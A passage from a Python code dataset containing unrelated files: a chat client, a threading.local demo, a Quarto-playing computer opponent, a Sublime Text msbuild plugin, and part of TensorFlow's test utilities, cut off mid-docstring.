source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
Run.py
|
import string
from Read import getUser, getMessage
from Initialize import createUsers, switchUser, startRooms
from Settings import usernames
import threading
from GUI import GUI
def refreshMessages():
from Initialize import users, currentUserIndex
readbuffer = ""
while True:
readbuffer = readbuffer + users[currentUserIndex].recv(1024)
temp = string.split(readbuffer, "\n")
readbuffer = temp.pop()
for line in temp:
gui.displayMessage(line)
user = getUser(line)
message = getMessage(line)
gui.displayMessage(user + " typed :" + message)
createUsers()
global gui
gui = GUI()
guiThread = threading.Thread(target=gui.startGUI)
guiThread.start()
startRooms(gui)
messageThread = threading.Thread(target=refreshMessages)
messageThread.start()
|
local.py
|
#!/usr/bin/env python
# encoding: UTF-8
import threading
local=threading.local()
local.tname='main'
def func():
local.tname='notmain'
print local.tname
t1=threading.Thread(target=func)
t1.start()
t1.join()
print local.tname
|
racunalnik.py
|
import threading # za vzporedno izvajanje
import random # za naključen izbor prve poteze
import time
from minimaxAB import *
from quarto import *
from igra import *
######################################################################
## Igralec računalnik
class Racunalnik():
def __init__(self, gui, algoritem,tezavnost):
self.gui = gui
self.algoritem = algoritem # Algoritem, ki izračuna potezo
self.mislec = None # Vlakno (thread), ki razmišlja
self.globina = MINIMAXAB_GLOBINA
self.casovna_omejitev = tezavnost / 100
self.globinska_omejitev = 16
def igraj(self):
"""Igraj potezo, ki jo vrne algoritem."""
# Naredimo vlakno, ki mu podamo *kopijo* igre (da ne bo zmedel GUIja):
if self.gui.igra.izbrana_figura == None:
# Naključen izbor prve igralne figure
self.gui.izberi_figuro(random.choice(self.gui.igra.mozne_figure))
# Izbor prve možne igralne figure
#self.gui.izberi_figuro(self.gui.igra.mozne_figure[0])
else:
self.mislec = threading.Thread(
target=lambda: self.algoritem.izracunaj_potezo(self.gui.igra.kopija(),self.globina))
# Poženemo vlakno:
self.mislec.start()
self.zacni_meriti_cas = time.time()
# Gremo preverjat, ali je bila najdena poteza:
self.gui.plosca.after(100, self.preveri_potezo)
def preveri_potezo(self):
"""Vsakih 100ms preveri, ali je algoritem že izračunal potezo."""
if (self.algoritem.poteza is not None) and (self.algoritem.figura is not None):
# Algoritem je našel potezo, povleci jo, če ni bilo prekinitve
self.pretekli_cas = time.time() - self.zacni_meriti_cas
if self.pretekli_cas > self.casovna_omejitev or self.globinska_omejitev <= self.globina:
if len(self.gui.igra.veljavne_poteze()) == 16:
self.globina = MINIMAXAB_GLOBINA
self.gui.povleci_potezo(self.algoritem.poteza)
if self.algoritem.figura != 'konec':
self.gui.izberi_figuro(self.algoritem.figura)
# Vzporedno vlakno ni več aktivno, zato ga "pozabimo"
self.mislec = None
else: #če je potezo izračunal prehitro povečamo globino
self.globina += 1
self.igraj()
else:
# Algoritem še ni našel poteze, preveri še enkrat čez 100ms
self.gui.plosca.after(100, self.preveri_potezo)
def prekini(self):
# To metodo kliče GUI, če je treba prekiniti razmišljanje.
if self.mislec:
logging.debug ("Prekinjamo {0}".format(self.mislec))
# Algoritmu sporočimo, da mora nehati z razmišljanjem
self.algoritem.prekini()
# Počakamo, da se vlakno ustavi
self.mislec.join()
self.mislec = None
def klik(self, p):
# Računalnik ignorira klike na igralno ploščo
pass
def gumb_klik(self, p):
# Računalnik ignorira klike na proste figure
pass
|
sbot_builder.py
|
import subprocess
import threading
import os
import json
import sublime
import sublime_plugin
try:
from SbotCommon.sbot_common import get_store_fn
except ModuleNotFoundError as e:
sublime.message_dialog('SbotBuilder plugin requires SbotCommon plugin')
raise ImportError('SbotBuilder plugin requires SbotCommon plugin')
BUILDER_SETTINGS_FILE = "SbotBuilder.sublime-settings"
# Definitions. Key is build file extension, value is type.
BUILD_TYPES = {'sln': 'msbuild', 'csproj': 'msbuild', 'vcxproj': 'msbuild'}
#-----------------------------------------------------------------------------------
class SbotBuilderCommand(sublime_plugin.WindowCommand):
# From https://www.sublimetext.com/docs/build_systems.html
_encoding = 'utf-8'
_killed = False
_proc = None
_output_view = None
_output_view_lock = threading.Lock()
_prev_view = None
# The persisted builders: key is st project name and value is corresponding build file.
_blds = None
_store_fn = '???'
def is_enabled(self, arg=''):
# The Cancel build option should only be available when the process is still running.
if arg == 'kill':
return self._proc is not None and self._proc.poll() is None
return True
def run(self, arg=''):
try:
settings = sublime.load_settings(BUILDER_SETTINGS_FILE)
# Lazy init.
if self._blds is None:
self._blds = {}
file_path = settings.get('file_path')
self._store_fn = get_store_fn(file_path, 'all.sbot-bld')
self._open_blds()
vars = self.window.extract_variables()
st_project_fn = vars['project_base_name']
# Process specific command.
if arg == 'kill':
if self._proc:
self._killed = True
self._proc.terminate()
elif arg == 'select':
# Sanity check.
if not vars['file_extension'] in BUILD_TYPES:
raise("Build file type not supported")
# Store current selected file to build with in this project.
fn = vars['file']
self._blds[st_project_fn] = fn
self._save_blds()
elif arg == '' or arg == 'rebuild':
# Sanity check.
if st_project_fn not in self._blds:
raise("No build file selected for this project")
build_file = self._blds[st_project_fn]
build_cmd, res_regex, res_syntax = self._get_build_specs(build_file, arg)
working_dir = vars['file_path']
# A lock is used to ensure only one thread at a time is touching the output.
with self._output_view_lock:
# Create view for output.
if(settings.get('output') == 'panel'):
# Creating the panel implicitly clears any previous contents.
self._output_view = self.window.create_output_panel('exec')
else: # assume plain view
if self._output_view not in self.window.views():
self._output_view = self.window.new_file()
self._output_view.set_scratch(True)
# In views, find results fail until the focus is lost and regained.
# This is a bug in Sublime, so work around it by changing the focus.
self._prev_view = self.window.active_view()
self.window.focus_view(self._output_view)
# Enable result navigation.
# https://sublime-text-unofficial-documentation.readthedocs.io/en/latest/reference/settings.html
view_settings = self._output_view.settings()
view_settings.set('result_base_dir', working_dir)
view_settings.set('syntax', res_syntax)
view_settings.set('result_file_regex', res_regex)
view_settings.set('word_wrap', True)
# diags: sublime.log_result_regex(True)
if(settings.get('output') == 'panel'):
self.window.run_command('show_panel', {'panel': 'output.exec'})
else: # assume view
pass
# Maybe clean up first.
if self._proc is not None:
self._proc.terminate()
self._proc = None
self._proc = subprocess.Popen(build_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=working_dir)
self._killed = False
# Go!
threading.Thread(target=self._read_handle, args=(self._proc.stdout,)).start()
except Exception as e:
sublime.error_message(f"{e}")
def _get_build_specs(self, build_file, arg):
build_cmd = None
res_regex = None
res_syntax = None
bld_root, bld_ext = os.path.splitext(build_file)
bld_ext = bld_ext.replace('.', '')
if bld_ext in BUILD_TYPES:
bt = BUILD_TYPES[bld_ext]
if bt == 'msbuild':
# Assemble the build command. Set env then run msbuild.
cmd = 'Build'
if arg == 'rebuild':
cmd = 'Rebuild'
elif arg == 'init':
cmd = 'Restore'
cmd1 = '\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\VsDevCmd.bat\"'
cmd2 = f"""msbuild \"{build_file}\" /p:Configuration=Debug /t:{cmd} -v:m"""
args = [cmd1, '&', cmd2]
build_cmd = ' '.join(args)
res_regex = r'^([^\(]*)\(([0-9]+),([0-9]+)\): (.+)$'
res_syntax = 'MSBuild Output.sublime-syntax'
else:
raise(f"Invalid build file {build_file}")
return build_cmd, res_regex, res_syntax
def _read_handle(self, handle):
chunk_size = 2 ** 13 # 8191
out = b'' # data bytes
while True:
try:
data = os.read(handle.fileno(), chunk_size)
out += data
# If exactly the requested number of bytes was read, there may be more data.
if len(data) == chunk_size:
continue
if data == b'' and out == b'':
raise IOError('EOF')
sout = out.decode(self._encoding).replace('\r', '') # Win has extraneous CR.
self._queue_write(sout)
# A list of tuples of the regexed output:
# self._output_view.find_all_results_with_text()
if data == b'':
raise IOError('EOF')
out = b''
except (UnicodeDecodeError) as e:
self._queue_write(f'Error decoding output using {self._encoding} - {str(e)}')
break
except (IOError):
if self._killed:
self._queue_write('[Cancelled]')
else:
self._queue_write('[Finished]')
# In views, find results fail until the focus is lost and regained.
# This is a bug in Sublime, so work around it by changing the focus.
self.window.focus_view(self._prev_view)
self.window.focus_view(self._output_view)
break
def _queue_write(self, text):
sublime.set_timeout(lambda: self._do_write(text), 1)
def _do_write(self, text):
with self._output_view_lock:
self._output_view.run_command('append', {'characters': text})
def _open_blds(self):
''' General persistence opener. '''
if os.path.isfile(self._store_fn):
with open(self._store_fn, 'r') as fp:
self._blds = json.load(fp)
else:
# Assumes new file.
sublime.status_message('Creating new builder file')
self._blds = {}
self._save_blds()
def _save_blds(self):
''' General persistence saver. '''
with open(self._store_fn, 'w') as fp:
json.dump(self._blds, fp, indent=4)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
class IsolateTest(object):
"""A context manager which isolates resources in its block.
Provides an Eager-agnostic abstraction for preventing the sharing of
variables and other resources.
In graph mode, resource handle ops are only executed in a particular Session,
isolating them from resources with the same name in other Graphs. In Eager,
separate Sessions do not exist, so resources (particularly ResourceVariables)
would be shared implicitly if a resource of the same name were created
anywhere in a Python process. Multiple handles to the same resource would
cause several issues, and so this type of sharing will raise an exception.
Using resources with the same name in a single Python process may be useful
(especially for unit tests), so this context manager provides an abstraction
for isolating resources. Using a resource created in one Isolation environment
in another is an error.
Example usage in Eager mode:
```python
import tensorflow as tf
# Import subject to change
from tensorflow.contrib.eager.python import tfe
tfe.enable_eager_execution()
for hyperparameter in [1, 2, 3]:
with tfe.IsolateTest():
v = tfe.Variable(name="v", initial_value=hyperparameter)
# train model, test results ...
```
IsolateTest is currently exposed through contrib.eager, but it creates a new
default Graph and provides equivalent safety in graph mode.
"""
def __init__(self):
if context.in_eager_mode() and tape.could_possibly_record():
raise ValueError("Cannot isolate Eager execution with an active tape.")
# In Eager, Graphs set a container which isolates resources, and maintain a
# VariableStore which caches ResourceVariable objects created through
# get_variable. So setting the default Graph has the side effect of
# isolating Eager resources.
with context.eager_mode():
# Create the graph in Eager mode, as this provides stricter semantics
# (i.e. has a unique container prefix). This prevents implicit sharing
# when a Graph-mode graph is created and then Eager mode is enabled (an
# error through enable_eager_execution, but common with context managers
# in unit tests).
self._graph_as_default_context_manager = ops.Graph().as_default()
def __enter__(self):
self._graph_as_default_context_manager.__enter__()
def __exit__(self, type_arg, value_arg, traceback_arg):
return self._graph_as_default_context_manager.__exit__(
type_arg, value_arg, traceback_arg)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_container_prefix = ops.get_default_graph()._container_prefix
with IsolateTest():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the container prefix so that we can print the values
# of variables which get leaked when executing eagerly.
ops.get_default_graph()._container_prefix = outside_container_prefix
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._last_zero = [None]
backprop._shape_dtype = [None, None]
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(
__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True, assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with IsolateTest():
run_eager_mode(self, **kwargs)
return decorated
return decorator
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
